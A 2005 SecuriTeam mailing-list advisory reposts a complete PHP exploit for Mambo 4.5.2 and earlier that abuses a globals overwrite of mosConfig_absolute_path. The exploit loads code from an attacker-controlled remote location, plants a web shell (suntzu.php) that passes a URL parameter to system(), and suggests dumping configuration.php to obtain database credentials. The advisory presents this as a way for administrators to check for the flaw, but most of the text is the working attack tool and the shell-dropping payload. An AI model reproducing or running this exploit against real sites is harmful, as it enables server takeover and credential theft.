[EXPL] Mambo Variable Command Execution (Exploit, mosConfig_absolute_path)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/30/05

  • Next message: SecuriTeam: "[NT] Cisco Security Agent Vulnerable to Privilege Escalation" 
    To: list@securiteam.com
Date: 30 Nov 2005 09:40:31 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Mambo Variable Command Execution (Exploit, mosConfig_absolute_path)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.mamboserver.com/> Mambo is "powerful Open Source Content
    Management Systems. Mambo is used all over the world for everything from
    simple websites to complex corporate applications".

    A vulnerability in Mambo's mosConfig_absolute_path variable allows remote
    command execution, the following exploit code can be used to verify
    whether your Mambo installation is vulnerable.

    DETAILS

    Vulnerable Systems:
     * Mambo version 4.5.2 and prior

    Exploit:
    <?php
    #
    # ---mambo452_xpl.php 15.19 17/11/2005
    #
    # Mambo <= 4.5.2 Globals overwrite / remote commands execution
    # coded by rgod
    # site: http://rgod.altervista.org
    #
    # usage: launch from Apache, fill in requested fields, then go!
    #
    # Sun-Tzu: "Rapidity is the essence of war: take advantage of the enemy's
    # unreadiness, make your way by unexpected routes, and attack unguarded
    # spots."

    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout", 2);
    ob_implicit_flush (1);

    echo'<html><head><title> ********* Mambo <= 4.5.2 remote commands xctn
    *********
    </title><meta http-equiv="Content-Type" content="text/html;
    charset=iso-8859-1">
    <style type="text/css"> body {background-color:#111111;
    SCROLLBAR-ARROW-COLOR:
    #ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; }
    img
    {background-color: #FFFFFF !important} input {background-color: #303030
    !important} option { background-color: #303030 !important} textarea
    {background-color: #303030 !important} input {color: #1CB081 !important}
    option
    {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
    {background-color: #303030 !important} select {font-weight: normal; color:
    #1CB081; background-color: #303030;} body {font-size: 8pt !important;
    background-color: #111111; body * {font-size: 8pt !important} h1
    {font-size:
    0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
    !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size:
    0.8em
    !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
    !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} *
    {font-style:
    normal !important} *{text-decoration: none !important}
    a:link,a:active,a:visited
    { text-decoration: none ; color : #99aa33; } a:hover{text-decoration:
    underline;
    color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,
    sans-serif;
    font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,
    sans-serif;
    font-weight:bold; font-style: italic;}--></style></head><body><p
    class="Stile6">
    ********** Mambo <= 4.5.2 remote commands xctn **********</p><p
    class="Stile6">a
    script by rgod at <a href="http://rgod.altervista.org"target="_blank">
    http://rgod.altervista.org></p><table width="84%"><tr><td width="43%">
    <form
    name="form1" method="post" action="'.$SERVER[PHP_SELF].'"> <p><input
    type="text" name="host"> <span class="Stile5">* hostname
    (ex:www.sitename.com)
    </span></p> <p><input type="text" name="path"> <span class="Stile5">* path
    (ex:
    /mambo/ or just / ) </span></p><p><input type="text" name="command"> <span
    class="Stile5"> * specify a command , "cat configuration.php" to see
    database
    username & password </span></p> <p><input type="text" name="location">
    <span
    class="Stile5"> * remote location ( ex:     http://www.somesite.com) </span>
    </p>
    <p> <input type="text" name="port"><span class="Stile5">specify a port
    other
    than 80 ( default value ) </span></p> <p> <input type="text" name="proxy">
    <span class="Stile5"> send exploit through an HTTP proxy
    (ip:port)</span></p>
    <p><input type="submit" name="Submit" value="go!"></p></form>
    </td></tr></table>
    </body></html>';

    function show($headeri)
    {
    $ii=0;
    $ji=0;
    $ki=0;
    $ci=0;
    echo '<table border="0"><tr>';
    while ($ii <= strlen($headeri)-1)
    {
    $datai=dechex(ord($headeri[$ii]));
    if ($ji==16) {
    $ji=0;
    $ci++;
    echo "<td> </td>";
    for ($li=0; $li<=15; $li++)
    { echo "<td>".$headeri[$li+$ki]."</td>";
    }
    $ki=$ki+16;
    echo "</tr><tr>";
    }
    if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
    {echo "<td>".$datai."</td> ";}
    $ii++;
    $ji++;
    }
    for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
    { echo "<td>&nbsp&nbsp</td>";
    }

    for ($li=$ci*16; $li<=strlen($headeri); $li++)
    { echo "<td>".$headeri[$li]."</td>";
    }
    echo "</tr></table>";
    }
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

    function sendpacket() //if you have sockets module loaded, 2x speed! if
    not,load
    //next function to send packets
    {
    global $proxy, $host, $port, $packet, $html, $proxy_regex;
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($socket < 0) {
    echo "socket_create() failed: reason: " . socket_strerror($socket) .
    "<br>";
    }
    else
    { $c = preg_match($proxy_regex,$proxy);
    if (!$c) {echo 'Not a valid prozy...';
    die;
    }
    echo "OK.<br>";
    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
    if ($proxy=='')
    {
    $result = socket_connect($socket, $host, $port);
    }
    else
    {

    $parts =explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $result = socket_connect($socket, $parts[0],$parts[1]);
    }
    if ($result < 0) {
    echo "socket_connect() failed.\r\nReason: (".$result.") " .
    socket_strerror($result) . "<br><br>";
    }
    else
    {
    echo "OK.<br><br>";
    $html= '';
    socket_write($socket, $packet, strlen($packet));
    echo "Reading response:<br>";
    while ($out= socket_read($socket, 2048)) {$html.=$out;}
    echo nl2br(htmlentities($html));
    echo "Closing socket...";
    socket_close($socket);

    }
    }
    }
    function sendpacketii($packet)
    {
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='')
    {$ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) { echo 'No response from '.htmlentities($host);
    die; }
    }
    else
    {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {echo 'Not a valid prozy...';
    die;
    }
    $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) { echo 'No response from proxy...';
    die;
    }
    }
    fputs($ock,$packet);
    if ($proxy=='')
    {

    $html='';
    while (!feof($ock))
    {
    $html.=fgets($ock);
    }
    }
    else
    {
    $html='';
    while ((!feof($ock)) or
    (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
    $html.=fread($ock,1);
    }
    }
    fclose($ock);
    echo nl2br(htmlentities($html));
    }
    $host=$_POST[host];$path=$_POST[path];$command=$_POST[command];
    $proxy=$_POST[proxy];$location=$_POST[location];$port=$_POST[port];

    if (($host<>'') and ($path<>'') and ($command<>'') and ($location<>''))
    {

    $port=intval(trim($port));
    if ($port=='') {$port=80;}
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error...
    check the path!'; die;}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    $host=str_replace("\r\n","",$host);
    $path=str_replace("\r\n","",$path);

    $packet="GET
    ".$p."index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1
    &GLOBALS=&mosConfig_absolute_path=".urlencode($location)." HTTP/1.1\r\n";
    $packet.="User-Agent: NeuralBot/0.2\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);

    $packet="GET ".$p."suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
    $packet.="User-Agent: S.T.A.L.K.E.R.\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    if (eregi("Hi Master",$html)) {echo "Exploit succeeded...";}
    else {echo "Exploit failed...";}

    }
    else
    {
    echo "Note: on remote location you need this code in <br>
    http:/[location]/includes/HTML_toolbar.php/index.html :<br>";
    echo nl2br(htmlentities("
    <?php
    \$fp=fopen(\"suntzu.php\",\"w\");
    fputs(\$fp,\"<? echo 'Hi
    Master';error_reporting(0);ini_set('max_execution_time',0);
    system(\$HTTP_GET_VARS[cmd]);?>\");
    fclose(\$fp);
    ?>
    "));
    echo "<br>Fill * requested fields, optionally specify a proxy...";
    }
    ?>

    ADDITIONAL INFORMATION

    The information has been provided by rgod.
    The original article can be found at: <http://rgod.altervista.org >
    http://rgod.altervista.org

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Cisco Security Agent Vulnerable to Privilege Escalation"

    Relevant Pages